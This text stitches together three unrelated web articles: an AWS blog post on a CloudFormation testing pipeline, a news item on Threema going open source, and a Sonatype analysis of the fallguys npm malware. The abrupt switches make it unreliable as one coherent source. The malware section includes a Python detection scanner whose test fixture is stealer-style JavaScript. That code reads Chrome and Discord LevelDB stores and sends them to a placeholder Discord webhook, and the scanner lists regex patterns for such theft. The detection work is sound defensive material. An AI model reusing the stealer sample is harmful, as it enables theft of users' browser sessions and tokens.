Once the prerequisite tasks are completed, the pipeline is ready to be deployed. Detailed information about deployment, altering the source code to fit your use case, and troubleshooting issues can be found at the GitHub page for the Automated Testing Pipeline.

For those looking to jump right into deployment, click the Launch Stack button below.

Tasks to complete after deployment:

After the code is pushed to the CodeCommit repository and the CloudFormation template has been uploaded to S3, the pipeline runs automatically. You can visit the CodePipeline console to confirm that the pipeline is running with an In Progress status.

You may desire to alter various aspects of the Automated Testing Pipeline to better fit your use case. Listed below are some actions you can take to modify the solution to fit your needs:

The Automated Testing Pipeline directly addresses the challenges we faced with maintaining our OHDSI and REDCap solutions. Additionally, the pipeline can be used whenever there is a need to test CloudFormation templates that are being used on a regular basis or are distributed to other users. Listed below is the set of specific challenges we faced maintaining CloudFormation solutions and how the pipeline addresses them.

The desire to better serve our customers guided our decision to create the Automated Testing Pipeline. For example, we know that source code used to build the OHDSI-on-AWS environment changes on occasion. Some of these changes have caused the environment to stop functioning correctly. This left us with cases where our customers had to either open an issue on GitHub or reach out to AWS directly for support. Our customers depend on OHDSI-on-AWS functioning properly, so fixing issues is of high priority to our team. The ability to run tests regularly allows us to take action without depending on notice from our customers. Now, we can be the first ones to know if something goes wrong and get to fixing it sooner.

"This automation will help us better monitor the CloudFormation-based projects our customers depend on to ensure they're always in working order." - James Wiggins, EDU HCLS SA Manager

If you decide to stop using the Automated Testing Pipeline, follow the steps below to remove the resources associated with it from your AWS account.

Deleting the pipeline CloudFormation stack handles removing the resources associated with its architecture. Depending on the CloudFormation template chosen for testing, additional resources associated with it may need to be removed. Visit our GitHub page for more information on removing resources.

The ability to continuously test preexisting solutions on AWS has great benefits for our team and our customers. The automated nature of this testing frees up time for us and our customers, and the dashboard makes issues more visible and easier to resolve. We believe that sharing this story can benefit anyone facing challenges maintaining CloudFormation solutions in AWS. Check out the Getting Started with the Automated Testing Pipeline section of this post to deploy the solution.

More information about the key services and open-source software used in our pipeline can be found at the following documentation pages:

Raleigh Hansen is a former Solutions Architect Intern on the Academic Medical Centers team at AWS. She is passionate about solving problems and improving upon existing systems. She also adores spending time with her two cats.

Dan Le is a former Solutions Architect Intern on the Academic Medical Centers team at AWS. He is passionate about technology and enjoys doing art and music.

Signal Alternative ‘Threema’ Goes Open Source, Works Without Phone Number – Fossbytes

Threema is an encrypted messaging service that has competed as a Signal alternative so far. In terms of features, privacy, and security, Threema is on par with Signal. However, it wasn't open source until now.

Now, the company has announced that Threema apps will become fully open source, supporting reproducible builds, in the coming months.

As of January 2020, Threema had more than 8 million users, including over 2 million users of the business solution Threema Work (which covers nearly 5,000 organizations). This change should help gain the trust of skeptical users.

By going open source, Threema makes it easier for anyone to review the apps' security and verify the code independently. The reproducible builds matter as much as the source release: they let a third party confirm that the binary shipped through the app stores was built from the published source, rather than only that the published source is clean.

These days there are multiple secure and private messaging apps for encrypted communication. But some messaging services store messages on the company's servers, whereas with others the company cannot access the user's data. Threema belongs to the latter category.

The best part about Threema is that it assigns each user a unique ID, so it doesn't need a phone number to work, unlike WhatsApp or Hike.

But it is not to be confused with apps like Telegram, which mainly target the average consumer. Threema is more of a premium product that offers voice and text messages, groups, distribution lists, file sharing, and location sharing.

Inside the fallguys malware that steals your browsing data and gaming IMs; Continued attack on open source software – Security Boulevard

This weekend a report emerged of mysterious npm malware stealing sensitive information from Discord apps and web browsers installed on a user's machine.

The malicious component, called fallguys, was published to npm impersonating an API for the widely popular video game Fall Guys: Ultimate Knockout. Its actual purpose, however, was rather sinister.

As first reported by ZDNet and analyzed by the npm security team, the component, when included in your development builds, would run alongside your program and access the following files:

The file list comprises the local storage LevelDB files of different web browsers, such as Chrome, Opera, Yandex, and Brave, along with those of any locally installed Discord app.

LevelDB is a key-value storage format used by web browsers mainly to store data related to a user's browsing sessions.

The fallguys component would read these files and upload their contents to a third-party Discord server, e.g. via webhooks.
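The behaviour described above suggests a cheap local check a dependency reviewer can run over an installed `node_modules` tree: look for package source that names the browsers' or Discord's `Local Storage/leveldb` stores, reads files from them, and carries a Discord webhook URL. The Python below is an added example, not Sonatype's analysis code and not the fallguys source; the post does not list the exact files the package read, so the indicator patterns and the two constructed JavaScript samples are assumptions. It generalises from fallguys to any package that combines the same two ingredients.

```python
"""Indicator scan for npm packages that read browser or Discord LevelDB
stores and exfiltrate them to a Discord webhook, the behaviour the post
attributes to fallguys.

Added example: not Sonatype's code and not the malware itself. The post does
not list the exact files fallguys read, so the indicators are assumptions.
"""
import os
import re

# Each indicator is one element of the described behaviour.
INDICATORS = {
    # Chromium-based browsers and Discord keep session data under this path.
    "leveldb_path": re.compile(r"Local Storage[\\/]+leveldb", re.I),
    # Product directories for the applications the post names.
    "profile_dir": re.compile(r"Google[\\/]+Chrome|Opera Software|Yandex|BraveSoftware|discord", re.I),
    # Exfiltration target: a Discord webhook URL (channel id / token).
    "discord_webhook": re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I),
    # Node file-system calls used to enumerate and read the stores.
    "fs_read": re.compile(r"\b(?:readdirSync|readFileSync|createReadStream)\s*\("),
}


def score_source(js_source):
    """Count matches per indicator in one JavaScript source string."""
    return {name: len(rx.findall(js_source)) for name, rx in INDICATORS.items()}


def classify(hits):
    """Naming LevelDB stores *and* holding a webhook is the fallguys pattern;
    two of any indicators is worth a human look; otherwise clean."""
    if hits["leveldb_path"] and hits["discord_webhook"]:
        return "likely-stealer"
    if sum(1 for v in hits.values() if v) >= 2:
        return "suspicious"
    return "clean"


def scan_node_modules(root):
    """Walk an installed tree; return {package dir: (verdict, merged hits)}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        merged = {name: 0 for name in INDICATORS}
        for fn in files:
            if fn.endswith((".js", ".cjs", ".mjs")):
                with open(os.path.join(dirpath, fn), encoding="utf-8", errors="replace") as fh:
                    for name, n in score_source(fh.read()).items():
                        merged[name] += n
        findings[os.path.relpath(dirpath, root)] = (classify(merged), merged)
    return findings


# Constructed samples; neither is real package code.
BENIGN_SAMPLE = """
const fs = require('fs');
const cfg = JSON.parse(fs.readFileSync('./config.json', 'utf8'));
module.exports = { getScores: () => cfg.scores };
"""

STEALER_SAMPLE = """
const fs = require('fs'), path = require('path'), https = require('https');
const stores = [
  path.join(process.env.LOCALAPPDATA, 'Google/Chrome/User Data/Default/Local Storage/leveldb'),
  path.join(process.env.APPDATA, 'discord/Local Storage/leveldb'),
];
for (const dir of stores) for (const f of fs.readdirSync(dir)) {
  const body = fs.readFileSync(path.join(dir, f));
  https.request('https://discord.com/api/webhooks/000000000000000000/EXAMPLE_TOKEN', { method: 'POST' }).end(body);
}
"""

if __name__ == "__main__":
    import json
    import tempfile
    # Build a throwaway node_modules tree from the two samples and scan it.
    with tempfile.TemporaryDirectory() as root:
        for name, src in (("good-api", BENIGN_SAMPLE), ("fallguys-like", STEALER_SAMPLE)):
            pkg = os.path.join(root, "node_modules", name)
            os.makedirs(pkg)
            with open(os.path.join(pkg, "package.json"), "w") as fh:
                fh.write('{"name": "%s", "version": "0.0.0"}' % name)
            with open(os.path.join(pkg, "index.js"), "w") as fh:
                fh.write(src)
        for pkg, (verdict, hits) in scan_node_modules(os.path.join(root, "node_modules")).items():
            print(f"{pkg}: {verdict} {json.dumps(hits)}")
```

Run it against a real `node_modules` with `scan_node_modules("node_modules")` before a build is promoted; a `likely-stealer` verdict is a reason to block, and `suspicious` is a reason to read the package by hand, since legitimate tooling (browser automation, Discord bots) can legitimately hit one indicator or another.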

npm removed the malicious package, but we retain a copy of all components in a secure archive, so the Sonatype Security Research team was able to quickly analyze the malware. In fact, we had this in our data well before the news broke, so Nexus users are safe!

In this Nexus Intelligence Insights post, we share a first look inside fallguys.

Vulnerability identifier: sonatype-2020-0774
Vulnerability type: Embedded Malicious Code
Impacted package: fallguys, as formerly present in npm downloads

CVSS 3.1 Severity Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 Score: 10.0 (Critical)

While the fallguys package was likely created with malicious intent from the beginning, it exhibits outright suspicious behavior in version 1.0.6.

There are three files found in version 1.0.6. One is a README which touts the malware being a Fall (Read more...)
